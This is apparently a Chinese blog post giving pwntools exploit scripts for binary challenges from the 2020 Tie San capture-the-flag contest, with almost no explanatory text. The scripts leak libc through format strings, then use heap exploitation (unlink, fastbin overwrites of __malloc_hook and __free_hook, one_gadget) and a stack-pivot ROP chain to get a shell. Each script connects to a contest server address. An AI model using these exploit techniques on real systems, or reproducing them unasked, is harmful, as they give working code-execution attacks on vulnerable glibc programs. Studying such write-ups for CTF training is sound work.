2020 铁三 第一、二赛区

Posted on 2020-11-03  262 Views


第一赛区

1.hacknote

#!/usr/bin/python
#coding:utf-8
from pwn import *
context.log_level='debug'
context.update(arch='amd64',os='linux',timeout=1)
libc=ELF("./libc-2.23.so")
if args.Q:
	io=remote("172.20.13.39",'10001')
else:
	io=process("./hacknote")
def name(name):
	io.sendlineafter("name!\n",name)
def add(sz,ct='a'):
	io.sendlineafter("choice :",'1')
	io.sendlineafter("size :",str(sz))
	io.sendafter("Content :",ct)
def dele(idx):
	io.sendlineafter("choice :",'2')
	io.sendlineafter("Index :",str(idx))
def show(idx):
	io.sendlineafter("choice :",'3')
	io.sendlineafter("Index :",str(idx))
def main():
#0x0000555555554000
	#gdb.attach(io,'b *0x0000555555554000+0xa78')
	name("%13$p")
	io.recvuntil("hello ,")
	libc_base=int(io.recv(14),16)-libc.sym["__libc_start_main"]-256
	log.success("libc_base==>"+hex(libc_base))
	add(0x20)
	add(0x20)
	dele(0)
	dele(1)
	add(0x10,p64(libc_base+0x45216+0x10))
	gdb.attach(io,'b *{}'.format(libc_base+libc.sym['system']))
	show(0)
	io.interactive()
if __name__=='__main__':
	main()

2.note

#!/usr/bin/python
#coding:utf-8
from pwn import *
context.log_level='debug'
context.update(arch='amd64',os='linux',timeout=1)
base=0x0000555555554000
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
if args.Q:
	io=remote("172.20.13.39",'10002')
else:
	io=process("./heap")
def name(name):
	io.sendlineafter("name: ",name)
def add(sz):
	io.sendlineafter("choice: ",'1')
	io.sendlineafter("item: ",str(sz))
def show(idx):
	io.sendlineafter("choice: ",'2')
	io.sendlineafter("item: ",str(idx))
def edit(idx,ct):
	io.sendlineafter("choice: ",'3')
	io.sendlineafter("item: ",str(idx))
	io.sendlineafter("data: ",ct)
def dele(idx):
	io.sendlineafter("choice: ",'4')
	io.sendlineafter("item: ",str(idx))
def main():
	#gdb.attach(io,'b *{}'.format(base+0xb5e))
	name("%19$p-%15$p")
	io.recvuntil("Hello, ")
	libc_base=int(io.recv(14),16)-240-libc.sym["__libc_start_main"]
	io.recvuntil("-")
	text_base=int(io.recv(14),16)-0xee1
	one_gadget=libc_base+[0x45216,0x4526d,0xf0274,0xf1117][0]
	log.success("libc_base==>"+hex(libc_base))
	log.success("text_base==>"+hex(text_base))
	add(0x70)#0
	add(0x90)#1
	add(0x20)#2
	dele(0)
	edit(0,(p64(0)+p64(0x70)+p64(text_base+0x2020c0-0x18)+p64(text_base+0x2020c0-0x10)).ljust(0x70,'\x00')+p64(0x70)+p64(0xa0))
	dele(1)
	edit(0,p64(0)*3+p64(libc_base+libc.sym["__free_hook"]))
	edit(0,p64(libc_base+libc.sym["system"]))
	edit(2,'/bin/sh\x00')
	dele(2)
	#dele(2)
	#gdb.attach(io)
	io.interactive()
if __name__=='__main__':
	main()
#!/usr/bin/python
#coding:utf-8
from pwn import *
context.log_level='debug'
context.update(arch='amd64',os='linux',timeout=1)
base=0x0000555555554000
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
if args.Q:
	io=remote("172.20.13.39",'10002')
else:
	io=process("./heap")
def name(name):
	io.sendlineafter("name: ",name)
def add(sz):
	io.sendlineafter("choice: ",'1')
	io.sendlineafter("item: ",str(sz))
def show(idx):
	io.sendlineafter("choice: ",'2')
	io.sendlineafter("item: ",str(idx))
def edit(idx,ct):
	io.sendlineafter("choice: ",'3')
	io.sendlineafter("item: ",str(idx))
	io.sendlineafter("data: ",ct)
def dele(idx):
	io.sendlineafter("choice: ",'4')
	io.sendlineafter("item: ",str(idx))
def main():
	#gdb.attach(io,'b *{}'.format(base+0xb5e))
	name("%19$p")
	io.recvuntil("Hello, ")
	libc_base=int(io.recv(14),16)-240-libc.sym["__libc_start_main"]
	one_gadget=libc_base+[0x45216,0x4526b,0xf0274,0xf1117][1]
	log.success("libc_base==>"+hex(libc_base))
	add(0x60)
	dele(0)
	edit(0,p64(libc_base+libc.sym["__malloc_hook"]-0x23))
	log.success("malloc_hook==>"+hex(libc_base+libc.sym["__malloc_hook"]))
	add(0x60)
	add(0x60)
	edit(2,"a"*11+p64(one_gadget)+p64(libc_base+libc.sym["__libc_realloc"]+13))
	log.success("libc_base==>"+hex(libc_base))
	log.success("system==>"+hex(one_gadget))
	log.success("malloc_hook==>"+hex(libc_base+libc.sym["__malloc_hook"]))
	#gdb.attach(io,'b *{}'.format(one_gadget))
	add(0x20)
	io.interactive()
if __name__=='__main__':
	main()

第二赛区

1.note

#!/usr/bin/python
#coding:utf-8

from pwn import *
context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
if args.Q:
	io=remote()
else:
	io=process("./pwn")
	
def add(sz,title='a',ct='a'):
	io.sendlineafter("Choice:",'1')
	io.sendlineafter("size: ",str(sz))
	io.sendlineafter("title: ",title)
	io.sendlineafter("content: ",ct)
def dele(idx):
	io.sendlineafter("Choice:",'2')
	io.sendlineafter("delete: ",str(idx))
def show(idx):
	io.sendlineafter("Choice:",'3')
	io.sendlineafter("show: ",str(idx))

def main():
	add(0x20)
	add(0x90)
	add(0x20)
	dele(1)
	dele(0)
	add(0x20,'a'*0x10+'\x40')
	show(0)
	libc_base=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x3c4b78
	ogg=libc_base+[0x45216,0x4526a,0xf02a4,0xf1147][2]
	log.success("libc_base==>"+hex(libc_base))
	malloc_hook=libc_base+libc.sym["__malloc_hook"]
	add(0x90)
	add(0x20)
	add(0x60)
	add(0x60)#5
	dele(4)
	dele(3)
	add(0x20,'a'*0x10+'\x40')#3
	dele(5)
	dele(3)
	add(0x60,'a',p64(malloc_hook-0x23))#6
	add(0x60)
	add(0x60)
	add(0x60,'a','a'*0x13+p64(ogg))
	io.sendlineafter("Choice:",'1')
	io.sendlineafter("size: ",'20')
	#dele(0)
	#gdb.attach(io)
	io.interactive()
if __name__=='__main__':
	main()

2.stackstorm

#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'
elf=ELF("./pwn")
libc=ELF("./libc-2.23.so")
if args.Q:
	io=remote()
else:
	io=process("./pwn")
leave_r=0x00000000004007c1
main_addr=0x4007c3
pop_rdi=0x0000000000400903
pop_rsi_r15=0x0000000000400901
puts_plt=elf.sym["puts"]
puts_got=elf.got['puts']


def send(p1,p2):
	io.sendlineafter("data1:\n",p1)
	io.sendafter("data2:\n",p2)
def main():
	p1='1'
	p2='a'*0x70
	#pause()
	send(p1,p2)
	leak_bp=u64(io.recvuntil("\x7f")[-6:].ljust(8,'\x00'))
	log.success("leak_bp==>"+hex(leak_bp))
	p1='1'
	p2=(p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)).ljust(0x70,'a')+p64(leak_bp-0x98)+p64(leave_r)
	send(p1,p2)
	puts_leak=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
	
	log.success("puts_leak==>"+hex(puts_leak))
	libc_base=puts_leak-libc.sym['puts']-0x10
	log.success("libc_base==>"+hex(libc_base))
	ogg=libc_base+[0x45216,0x4526a,0xf02a4,0xf1147][3]
	system=libc_base+libc.sym["system"]+0x10
	binsh=libc_base+libc.search("/bin/sh").next()
	p1='1'
	p2='a'*0x70
	#pause()
	#gdb.attach(io,'b *{}'.format(0x4007c1))
	send(p1,p2)
	leak_bp=u64(io.recvuntil("\x7f")[-6:].ljust(8,'\x00'))
	log.success("leak_bp==>"+hex(leak_bp))
	p1='1'
	p2=(p64(pop_rdi)+p64(binsh+0xc0)+p64(system)).ljust(0x70,'a')+p64(leak_bp-0x98)+p64(leave_r)
	#gdb.attach(io,'b *{}'.format(0x4007af))
	send(p1,p2)
	#send(p1,p2)
	io.interactive()
if __name__=='__main__':
	main()